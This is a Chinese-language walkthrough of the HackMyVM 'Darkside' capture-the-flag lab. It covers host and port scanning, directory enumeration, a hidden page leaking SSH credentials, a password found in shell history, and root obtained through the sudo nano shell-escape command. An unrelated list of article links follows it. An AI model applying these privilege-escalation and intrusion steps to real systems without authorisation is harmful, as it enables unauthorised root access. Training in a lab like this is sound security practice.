当前位置: 首页 > article >正文

HakcMyVM-Darkside

article 2026/3/16 17:21:09
信息搜集主机发现┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.2.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-15 03:46 EDT Nmap scan report for darkside (192.168.2.19) Host is up (0.00023s latency). MAC Address: 08:00:27:3B:49:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap scan report for kali (192.168.2.12) Host is up. Nmap done: 256 IP addresses (9 hosts up) scanned in 2.75 seconds端口扫描┌──(kali㉿kali)-[~] └─$ nmap -A -p- 192.168.2.19 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-15 03:47 EDT Nmap scan report for darkside (192.168.2.19) Host is up (0.00050s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5deb11u2 (protocol 2.0) | ssh-hostkey: | 3072 e0:25:46:8e:b8:bb:ba:69:69:1b:a7:4d:28:34:04:dd (RSA) | 256 60:12:04:69:5e:c4:a1:42:2d:2b:51:8a:57:fe:a8:8a (ECDSA) |_ 256 84:bb:60:b7:79:5d:09:9c:dd:24:23:a3:f2:65:89:3f (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.56 (Debian) |_http-title: The DarkSide MAC Address: 08:00:27:3B:49:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.50 ms darkside (192.168.2.19) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.12 seconds漏洞利用看一下80端口有什么┌──(kali㉿kali)-[~] └─$ curl http://192.168.2.19 !DOCTYPE html html langen head meta charsetUTF-8 meta nameviewport contentwidthdevice-width, initial-scale1.0 link relstylesheet hrefstyles.css titleThe DarkSide/title /head body div classwelcome-message h1Welcome to the DarkSide/h1 /div div classmain form action methodPOST h1LOGIN/h1 labelUSERNAME/label input typetext nameuser labelPASSWORD/label input typepassword namepass button typesubmitLOGIN/button /form /div /body /html一个登录页面尝试目录扫描┌──(kali㉿kali)-[~] └─$ gobuster dir -u http://192.168.2.19 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git Gobuster v3.6 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart) [] Url: http://192.168.2.19 [] Method: GET [] Threads: 10 [] Wordlist: SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [] Negative Status codes: 404 [] User Agent: gobuster/3.6 [] Extensions: txt,jpg,png,zip,git,html,php [] Timeout: 10s Starting gobuster in directory enumeration mode /.html (Status: 403) [Size: 277] /.php (Status: 403) [Size: 277] /index.php (Status: 200) [Size: 683] /backup (Status: 301) [Size: 313] [-- http://192.168.2.19/backup/] /.php (Status: 403) [Size: 277] /.html (Status: 403) [Size: 277] /server-status (Status: 403) [Size: 277] /logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 277] Progress: 9482032 / 9482040 (100.00%) Finished 有个/backup/目录目录下vote.txt文件rijaba: Yes xerosec: Yes sml: No cromiphi: No gatogamer: No chema: Yes talleyrand: No d3b0o: Yes Since the result was a draw, we will let you enter the darkside, or at least temporarily, good luck kevin.我们拿到了用户名尝试爆破登陆以后得到了一串字符串解码出了sfqekmgncutjhbypvxda.onion查看一下┌──(kali㉿kali)-[~] └─$ curl http://192.168.2.19/sfqekmgncutjhbypvxda.onion/ !DOCTYPE html html head titleWhich Side Are You On?/title style body { background-color: black; color: white; font-size: 24px; margin: 0; } /style /head body div pWhich Side Are You On?/p /div script var sideCookie document.cookie.match(/(^| )side([^;])/); if (sideCookie sideCookie[2] darkside) { window.location.href hwvhysntovtanj.password; } /script /body /html读取cookie side如果值 darkside 跳转到hwvhysntovtanj.password那我们可以直接访问 hwvhysntovtanj.password┌──(kali㉿kali)-[~] └─$ curl http://192.168.2.19/sfqekmgncutjhbypvxda.onion/hwvhysntovtanj.password kevin:ILoveCalisthenicsssh登录一下┌──(kali㉿kali)-[~] └─$ ssh kevin192.168.2.19 The authenticity of host 192.168.2.19 (192.168.2.19) cant be established. ED25519 key fingerprint is SHA256:pmPw9d2/o54jNDmo29Hq6rIzWOQ//VhyZvK4KN6rmk. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 192.168.2.19 (ED25519) to the list of known hosts. kevin192.168.2.19s password: Linux darkside 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Oct 15 15:18:15 2023 from 10.0.2.18 kevindarkside:~$权限提升在.history发现了密码尝试一下kevindarkside:~$ cat .history ls -al hostname -I echo Congratulations on the OSCP Xerosec top ps -faux su rijaba ILoveJabita ls /home/rijaba kevindarkside:~$ su rijaba Password: rijabadarkside:/home/kevin$ id uid1001(rijaba) gid1001(rijaba) groups1001(rijaba)进入nano按CTRLRCTRLX输入reset; sh 10 20就提权成功了rijabadarkside:~$ sudo -l Matching Defaults entries for rijaba on darkside: env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User rijaba may run the following commands on darkside: (root) NOPASSWD: /usr/bin/nano # id uid0(root) gid0(root) groups0(root)

相关文章:

HakcMyVM-Darkside

信息搜集 主机发现 ┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.2.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-15 03:46 EDT Nmap scan report for darkside (192.168.2.19) Host is up (0.00023s latency). MAC Address: 08:00:27:3B:49:15 (PCS Systemt…...

编程日记 2026/3/16 17:21:09

基于C语言的轻量级在线商城服务端设计与实现

在当前以Java、Go和Python为主导的电商后端技术生态中,使用C语言构建Web服务似乎显得格格不入。然而,在资源受限环境或对性能有极致追求的场景下,C语言的价值不容忽视。它能够提供对内存和系统调用的精确控制,避免高级语言运行时带…...

编程日记 2026/3/16 17:21:09

欧姆龙CP1H与台达VFD - M变频器的MODBUS RTU通讯实战

欧姆龙CP1H的MODBUS RTU简易主站通讯,通过CP1W-CIF11板与台达VFD-M变频器进行。PLC程序进行轮询通讯,正常情况下只进行读操作,当修改频率或者操作启停命令时,才进行写操作,写操作完成后自动移除。 从而起到保护从站变频…...

编程日记 2026/3/16 17:21:09

从能跑到跑得快:一次大模型硬件加速的工程实践

从能跑到跑得快:一次大模型硬件加速的工程实践 写大模型应用时,很多团队最先遇到的问题不是“模型会不会答”,而是“模型为什么这么慢”。 一套模型在开发阶段能跑起来,和它能在线上稳定、低延迟、可并发地服务用户,是…...

编程日记 2026/3/16 17:21:09

【第二周】RAG与Agent实战13:通用提示词模板 (PromptTemplate)

在之前我们直接将字符串传给模型: model.invoke("帮我写一首诗")这种写法叫做 Zero-shot(零样本) 提示。但在实际应用中,我们需要动态地替换提示词中的内容(比如用户的名字、查询的问题、文档的片段&#xf…...

编程日记 2026/3/16 17:21:07

基于VirtualLab Fusion的复合光源仿真

摘要能够在一个系统中包含多个光源是许多应用的基础,如成像或照明。VirtualLabFusion提供了解决这类问题的高级选项。在本文档中,我们简要概述了如何设置复合光源,并给出了几个仿真示例。概览复合光源可以:包含任意数量的主光源。…...

编程日记 2026/3/16 17:19:07

快速清理手机QQ大量占用的存储空间

快速清理手机QQ大量占用的存储空间 众所周知,手机QQ随着使用会占据越来越多的磁盘空间,甚至多达上百GB。 在面对如此大量的存储数据时,无论是QQ自带的清理工具,还是手机管家之类系统自带的清理工具,其实往往都表现很糟…...

编程日记 2026/3/16 17:19:07

LITESTAR 4D 新模块:Sport Plus-运动场高级照明管理模块

您是否想要一个程序以自动,简单和快速的方式设计运动区域的照明?如果是这样,LITESTAR 4D Litecalc 运动区的额外模块 Sport Plus 是理想的解决方案。区域和高桅杆定义运动区域和高杆定义中可以设定以下内容:1. 运动设施的一般区域…...

编程日记 2026/3/16 17:19:07

使用OpenClaw+Skill自动发布微信公众号文章

一、OpenClaw 介绍 OpenClaw 是一款‌本地优先、可自托管的AI自动化代理工具‌,可以运行在你自己的电脑上,通过各种聊天工具(飞书、QQ、Telegram 等)与你对话,帮你完成各种任务。 1.1 什么是 OpenClaw? 你可…...

编程日记 2026/3/16 17:19:07

受激发射损耗(STED)显微镜原理

摘要受激发射损耗(STED)显微镜描述了一种常用的技术,以实现在生物应用的超分辨率。在这种方法中,两束激光—一束正常,一束转变成甜甜圈模式—被叠加到荧光样品上。通过使用荧光过程的发射和损耗以及利用由此产生的饱和效应,与通常…...

编程日记 2026/3/16 17:19:07

电工操作证报名照片太大?1分钟学会照片压缩技巧

报考电工操作证,作为从事电力作业、设备维修、线路安装的一线人员,日常工作强度大、时间零散,报名办证时照片上传常常成为麻烦事。很多电工朋友已经按要求拍好证件照,清晰度、着装、背景都没问题,就因为照片文件体积太…...

编程日记 2026/3/16 17:17:06

在虚拟机中安装一个linux操作系统

...

编程日记 2026/3/16 17:17:06

ch4_1

//--------------------- // ch4_1.cpp //--------------------- #include<iostream> using namespace std; //--------------------- int main(){int i1,sum0; //初始化while(i<100){sumsumi;ii1;}cout<<"sum "<<sum<<endl; }//---…...

编程日记 2026/3/16 17:17:06

AgenticAIoT - 自进化智能物联网平台

AgenticAIoT - 自进化智能物联网平台 平台简介 AgenticAIoT 是一款企业级自进化智能物联网平台,深度融合 AI 大模型、物联网(IoT) 与 AI 自主编程 三大核心能力。平台以"智能设备接入 + 数据智能流转 + 规则引擎联动 + AI 决策运维 + 自主进化"为核心理念,提供…...

编程日记 2026/3/16 17:17:06

redhat8安装教程

一&#xff0c;下载vm,redhat8的镜像文件与Xshall VM 的安装地址&#xff1a;VMware-workstation-full-17.6.1-24319023.exe_免费高速下载|百度网盘-分享无限制 redhat8镜像文件&#xff1a; RHEL-server-8.0-x86_64-LinuxProbe.Com.iso_免费高速下载|百度网盘-分享无限制 …...

编程日记 2026/3/16 17:17:05

基于SpringBoot与微信小程序的付费自习室系统设计与实现

一、系统开发背景与目标 随着社会对学习效率的重视&#xff0c;付费自习室成为学生、职场人士备考进修的热门选择&#xff0c;但传统预约依赖电话沟通或现场登记&#xff0c;存在座位冲突、时段选择不便等问题。基于SpringBoot后端与微信小程序前端的付费自习室系统&#xff0c…...

编程日记 2026/3/16 17:15:05

基于小程序的篮球场馆预订系统设计与实现

一、系统开发背景与意义 随着全民健身意识的提升&#xff0c;篮球运动成为大众喜爱的体育项目&#xff0c;但篮球场馆预订存在诸多痛点&#xff1a;传统预订依赖电话或现场排队&#xff0c;易出现信息滞后导致的场地冲突&#xff1b;用户难以实时了解场馆空闲时段、场地类型&am…...

编程日记 2026/3/16 17:15:05

从零搭建企业级堡垒机:JumpServer 开源 PAM 平台深度实战指南

引言 在当今云原生与混合 IT 架构盛行的时代&#xff0c;如何安全地管理对服务器、数据库、K8s 集群的访问权限&#xff0c;已成为每个企业必须面对的核心问题。传统“账号共享 密码硬编码”的方式早已被时代淘汰&#xff0c;取而代之的是 特权访问管理&#xff08;Privilege…...

编程日记 2026/3/16 17:15:05

5-7列表去重

输入一个列表&#xff0c;去掉列表中重复的数字&#xff0c;按原来次序输出&#xff01;输入格式:在一行中输入列表输出格式:在一行中输出不重复列表元素neval(input()) a[] for i in n:if i not in a:a.append(i) a1 .join(str(x) for x in a) print(a1)neval(input()) a[] fo…...

编程日记 2026/3/16 17:15:04

18 Byte Buddy 进阶指南:解锁 `@Pipe` 注解,实现灵活的方法转发

在 Java 字节码增强的世界里&#xff0c;Byte Buddy 以其简洁的 API 和强大的功能成为了开发者手中的利器。我们通常使用 MethodDelegation 配合 SuperCall 来调用父类逻辑&#xff0c;或者使用 This 操作当前实例。 但你是否遇到过这样的场景&#xff1a;你想拦截一个方法&am…...

编程日记 2026/3/16 17:13:04

Servlet配置实战:XML与注解对比

方式 1&#xff1a;XML 配置方式这种方式需要在 WEB-INF/web.xml 中配置 Servlet 映射&#xff0c;步骤如下&#xff1a;1.1 编写 Servlet 类在 src/main/java/com/example/web 下创建HelloServlet.java &#xff1a;1.2 在 web.xml 中配置 Servlet打开 src/main/webapp/WEB-IN…...

编程日记 2026/3/16 17:13:04

DeepSeek+豆包+Kimi降AI指令怎么写?保姆级教程来了

DeepSeek豆包Kimi降AI指令怎么写&#xff1f;保姆级教程来了 很多同学私信问我降AI到底怎么操作&#xff0c;今天出一个保姆级教程&#xff0c;照着做就行。 核心工具推荐嘎嘎降AI&#xff08;www.aigcleaner.com&#xff09;&#xff0c;4.8元/千字&#xff0c;操作简单效果…...

编程日记 2026/3/16 17:13:04

【LeetCodehot100】T24:两两交换链表中的节点 T25:K个一组翻转链表

T24:两两交换链表中的节点 题目核心是&#xff1a;两个两个一组&#xff0c;进行交换。交换的是节点&#xff0c;不是数字我们来举例只有两个节点的情况&#xff1a;&#xff08;1->2&#xff09; 原来&#xff1a;1.next2; 2.nextnull我们要变换为&#xff1a;2.next1; 1.n…...

编程日记 2026/3/16 17:13:04

从零开始学习Zookeeper:大数据分布式系统的守护者

从零开始学习Zookeeper:大数据分布式系统的守护者 关键词 Zookeeper、分布式协调、ZNode、ZAB协议、分布式锁、配置中心、服务注册与发现 摘要 在大数据与分布式系统的世界里,“协调"是最棘手的难题之一:如何让成百上千台机器像一个团队般默契协作?Zookeeper作为分…...

编程日记 2026/3/16 17:13:04

共模电感选型全攻略:功能、场景与关键参数深度解析

一、共模电感核心功能&#xff1a;电磁干扰的 “筛选器”共模电感&#xff08;又称共模扼流圈&#xff09;是 EMC 设计的核心器件&#xff0c;本质是由两个尺寸相同、匝数一致的线圈对称绕制在同一铁氧体磁芯上的四端器件&#xff0c;其核心功能围绕 “区分信号与干扰” 展开&a…...

编程日记 2026/3/16 17:11:03

springboot基于JavaWeb的大学生房屋租赁系统

第一章 系统开发背景与SpringBoot适配性 大学生租房群体&#xff08;如实习、考研、校外住宿需求&#xff09;在租赁过程中面临诸多痛点&#xff1a;房源信息分散在社交平台、中介朋友圈&#xff0c;缺乏针对大学生的专属筛选渠道&#xff0c;易遭遇“虚假房源”“中介高额佣金…...

编程日记 2026/3/16 17:11:02

springboot基于Java的旅游攻略分享平台

第一章 平台开发背景与SpringBoot适配性 当前旅游攻略领域面临诸多痛点&#xff1a;旅行者获取攻略多依赖旅游平台官方推荐&#xff0c;内容同质化严重&#xff0c;缺乏真实、个性化的本地体验分享&#xff1b;攻略创作者发布内容需在多个平台切换&#xff0c;数据分散且收益难…...

编程日记 2026/3/16 17:11:02

springboot基于Java的旅游民宿网络营销系统

第一章 系统开发背景与SpringBoot适配性 当前旅游民宿行业面临诸多营销痛点&#xff1a;民宿多依赖OTA平台&#xff08;如携程、美团&#xff09;获客&#xff0c;平台佣金高&#xff08;通常10%-20%&#xff09;且用户数据被垄断&#xff0c;民宿难以建立私域流量&#xff1b;…...

编程日记 2026/3/16 17:11:02

为什么某些老电脑只支持4G内存?

为什么有些老电脑只支持4G内存&#xff1f;首先要明确&#xff1a; &#xff08;1&#xff09; 32位操作系统限制的是“能用多少”&#xff0c; &#xff08;2&#xff09; 老电脑某些老主板限制的是“能插多大”。简单来说&#xff1a;32位系统确实只认4G&#xff0c;但很多老…...

编程日记 2026/3/16 17:11:02

接口幂等性详解:从理论到全链路实战方案

接口幂等性详解&#xff1a;从理论到全链路实战方案在分布式系统和高并发场景下&#xff0c;“接口幂等性”&#xff08;Idempotency&#xff09; 是一个老生常谈却又极易被忽视的核心概念。很多线上事故&#xff08;如用户重复扣款、订单重复创建、库存重复扣减&#xff09;的…...

编程日记 2026/3/16 17:09:01